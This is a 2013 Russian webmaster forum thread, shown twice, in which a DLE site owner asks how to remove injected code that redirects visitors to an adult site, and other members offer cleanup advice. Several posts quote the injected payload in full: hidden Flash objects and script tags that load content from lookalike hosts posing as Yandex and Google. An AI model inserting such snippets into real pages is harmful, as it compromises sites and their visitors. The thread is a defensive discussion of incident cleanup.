Помогите удалить вирус на ДЛЕ (чужой скрипт в новостях)

**kosa1** · 19.09.2013 00:11

Прошу помощи - на сайте стоит редирект на сайт 18+ , при чем то он есть, то его нет (редиректа...), яша ругается, но ничего не находят антивирусы... Стал рыскать, и увидел, что в каждой новости на сайте в полной и краткой стоят такие коды:

Код:

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?461984536"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?526533981" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object><script async="async" type="text/javascript" src="http://google-webmaster.ru/b6d767d2f8ed5d21a44b0e5886680cb9.js"></script>

где то повторяются где то отличаются... сайт -

Код:

http://dim-kino.com

Каждую новость геморойно редактировать - их много, можно ли как удалить сразу с каждой новости этот код сразу? И как обезопасить себя?

---------- Сообщение добавлено 19:11 ---------- Предыдущее 19:01 ----------

пытаюсь использовать встроенный поиск и замена - но он не находит и не заменяет этот код...

**bridge** · 19.09.2013 01:56

А если проверить файлы полной и короткой новостей в шаблоне?

**Planetsku** · 19.09.2013 09:30

kosa1,

Привет!
Я тоже недавно натолкнулся на жопу с вирусом! Долго искал что да как нашел virusonsite.ru Вроде помогло очень удобно и относительно не дорого.

**Leorik** · 28.09.2013 06:48

Planetsku, я тоже кстати этот сервис облюбовал

**bumer** · 28.09.2013 13:00

В шаблоне поищите, возможно там где то зарылась ссылка.

**Arsen** · 30.09.2013 07:53

kosa1,
Вирус вообще находится здесь: engine/cache/news_здесь ваши цивры и буквы, каждый файл нужно открывать (я использовал Notepad++) и из каждой новости удалять скрипт выгледит примерно так: В начале новости:

Код:

<script async="async" type="text/javascript" src="http://google-statistics.ru/js/c51ce410c124a10e0db5e4b97fc2af39.js"></script>

, В конце новости:

Код:

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?820373588"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?560644068" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object><script async="async" type="text/javascript" src="http://google-webmaster.ru/c51ce410c124a10e0db5e4b97fc2af39.js"></script>

Потом ставим фикс: http://dle-news.ru/bags/v10/1580-pot...le-minify.html. Меняем пороль от FTP и админ панели.... Если после этих действий вирус снова появляется обращайтесь к хостеру, значит у них где то дырка))

**liveman** · 30.09.2013 09:55

Сообщение от Arsen

Вирус вообще находится здесь: engine/cache/news_здесь ваши цивры и буквы, каждый файл нужно открывать (я использовал Notepad++) и из каждой новости удалять скрипт

На фига? Это же кеш страниц просто, тупо удаляем все из папки кроме папки system и файла .htaccess

**Arsen** · 30.09.2013 21:43

liveman, а затем что данные записываются в базу данных. И если вы просто удалите эти файлы они востоновятся из последнего кеша, и у вас будет опять новости с этим же скриптом.
Уже было проверенно.

**izyalex** · 30.09.2013 21:59

Нужно искать скрипт который генерирует эту дрянь.
Да прибудет к вам знание команд SSH: find grep .

**liveman** · 30.09.2013 22:40

Arsen, что за бред? из какого они кеша восстановятся, если удаляется кеш? Выше правильно написали - искать надо дыру, а не кеширование временное исправлять!

Файлы кеша - временные файлы, созданные для меньшей нагрузки. Закрыв дырку и исправив файлы кеша - ничего не изменится, так как эти файлы потом обновятся и дрянь появится снова.

Как закрыли дыру - следующий шаг поиск скрипта, который эту дрянь генерирует. Так как закрыв дырку, скрипт все равно уже есть на сайте и данная хрень все равно появится.

После удаления скрипта, меняйте пасы на все.

После смены пассов - опять удаляйте кеш.

ЗЫ, если плохой юзверь получил доступ к БД - только править ее либо откатывать (из копии резервной), так как там можно натворить все что угодно

	19.09.2013 00:11 #1
kosa1 Гуру Регистрация: 24.09.2010 Сообщений: 543 Репутация: 76 Webmoney BL: ?	Прошу помощи - на сайте стоит редирект на сайт 18+ , при чем то он есть, то его нет (редиректа...), яша ругается, но ничего не находят антивирусы... Стал рыскать, и увидел, что в каждой новости на сайте в полной и краткой стоят такие коды: Код: <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?461984536"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?526533981" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object><script async="async" type="text/javascript" src="http://google-webmaster.ru/b6d767d2f8ed5d21a44b0e5886680cb9.js"></script> где то повторяются где то отличаются... сайт - Код: http://dim-kino.com Каждую новость геморойно редактировать - их много, можно ли как удалить сразу с каждой новости этот код сразу? И как обезопасить себя? ---------- Сообщение добавлено 19:11 ---------- Предыдущее 19:01 ---------- пытаюсь использовать встроенный поиск и замена - но он не находит и не заменяет этот код... Платные опросы в интернете, зарабатывай без вложений!
0 kosa1

	19.09.2013 01:56 #2
bridge Опытный Регистрация: 16.06.2012 Сообщений: 380 Репутация: 37 Webmoney BL: ?	А если проверить файлы полной и короткой новостей в шаблоне?
0 bridge

	19.09.2013 09:30 #3
Planetsku Студент Регистрация: 06.10.2010 Сообщений: 36 Репутация: 15 Webmoney BL: ?	kosa1, Привет! Я тоже недавно натолкнулся на жопу с вирусом! Долго искал что да как нашел virusonsite.ru Вроде помогло очень удобно и относительно не дорого.
-1 Planetsku

	28.09.2013 06:48 #4
Leorik Дипломник Регистрация: 24.09.2013 Сообщений: 155 Репутация: -4 Webmoney BL: ?	Planetsku, я тоже кстати этот сервис облюбовал
-1 Leorik

	28.09.2013 13:00 #5
bumer Гуру Регистрация: 12.04.2011 Сообщений: 884 Записей в дневнике: 5 Репутация: 237 Webmoney BL: ?	В шаблоне поищите, возможно там где то зарылась ссылка.
0 bumer

Помогите удалить вирус на ДЛЕ (чужой скрипт в новостях)

Опции темы

Тэги топика:

Похожие темы

Помогите удалить вирус

Google chrome обнаружил вирус на нескольких Wordpress сайтах на одном хостинге, как удалить?

Помогите - на сайте вирус, его вижу, как удалить понятия не имею???

Удалить лишний скрипт в wordpress

Как удалить вирус с сайта??

Тем:

Сообщений:

Пользователей:

Сейчас на сайте:

Вход

Сайт

Разделы

Прочее

Следите за нами

Витрина ссылок

У нас проходит

У кого попросить инвайт?

Золотые темы форума

Последние новости

Популярные темы

Информеры

	30.09.2013 07:53 #6
Arsen Опытный Регистрация: 28.08.2013 Сообщений: 364 Репутация: 108 Webmoney BL: ?	kosa1, Вирус вообще находится здесь: engine/cache/news_здесь ваши цивры и буквы, каждый файл нужно открывать (я использовал Notepad++) и из каждой новости удалять скрипт выгледит примерно так: В начале новости: Код: <script async="async" type="text/javascript" src="http://google-statistics.ru/js/c51ce410c124a10e0db5e4b97fc2af39.js"></script> , В конце новости: Код: <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?820373588"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?560644068" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object><script async="async" type="text/javascript" src="http://google-webmaster.ru/c51ce410c124a10e0db5e4b97fc2af39.js"></script> Потом ставим фикс: http://dle-news.ru/bags/v10/1580-pot...le-minify.html. Меняем пороль от FTP и админ панели.... Если после этих действий вирус снова появляется обращайтесь к хостеру, значит у них где то дырка))
0 Arsen

	30.09.2013 09:55 #7
liveman работяга Регистрация: 24.03.2011 Сообщений: 346 Репутация: 113 Webmoney BL: ?	Сообщение от Arsen Вирус вообще находится здесь: engine/cache/news_здесь ваши цивры и буквы, каждый файл нужно открывать (я использовал Notepad++) и из каждой новости удалять скрипт На фига? Это же кеш страниц просто, тупо удаляем все из папки кроме папки system и файла .htaccess
0 liveman

	30.09.2013 21:43 #8
Arsen Опытный Регистрация: 28.08.2013 Сообщений: 364 Репутация: 108 Webmoney BL: ?	liveman, а затем что данные записываются в базу данных. И если вы просто удалите эти файлы они востоновятся из последнего кеша, и у вас будет опять новости с этим же скриптом. Уже было проверенно.
0 Arsen

	30.09.2013 21:59 #9
izyalex Опытный Регистрация: 20.11.2012 Сообщений: 254 Репутация: 38 Webmoney BL: ?	Нужно искать скрипт который генерирует эту дрянь. Да прибудет к вам знание команд SSH: find grep . Сpanel хостинг и ISPmanager хостинг от 119р./мес VIP Премиум хостинг в Москве, 1000р./мес и не парюсь
0 izyalex

	30.09.2013 22:40 #10
liveman работяга Регистрация: 24.03.2011 Сообщений: 346 Репутация: 113 Webmoney BL: ?	Arsen, что за бред? из какого они кеша восстановятся, если удаляется кеш? Выше правильно написали - искать надо дыру, а не кеширование временное исправлять! Файлы кеша - временные файлы, созданные для меньшей нагрузки. Закрыв дырку и исправив файлы кеша - ничего не изменится, так как эти файлы потом обновятся и дрянь появится снова. Как закрыли дыру - следующий шаг поиск скрипта, который эту дрянь генерирует. Так как закрыв дырку, скрипт все равно уже есть на сайте и данная хрень все равно появится. После удаления скрипта, меняйте пасы на все. После смены пассов - опять удаляйте кеш. ЗЫ, если плохой юзверь получил доступ к БД - только править ее либо откатывать (из копии резервной), так как там можно натворить все что угодно Последний раз редактировалось liveman; 30.09.2013 в 22:50. Причина: добавлено кучка слов
0 liveman

Темы	Раздел	Ответов	Последний пост
Помогите удалить вирус	Вопросы от новичков	4	18.03.2013 21:02
Google chrome обнаружил вирус на нескольких Wordpress сайтах на одном хостинге, как удалить?	Консультации по безопасности	9	03.03.2013 19:55
Помогите - на сайте вирус, его вижу, как удалить понятия не имею???	Консультации по безопасности	23	23.01.2013 22:34
Удалить лишний скрипт в wordpress	Вопросы от новичков	1	09.12.2012 00:47
Как удалить вирус с сайта??	Прочее	17	14.02.2012 05:37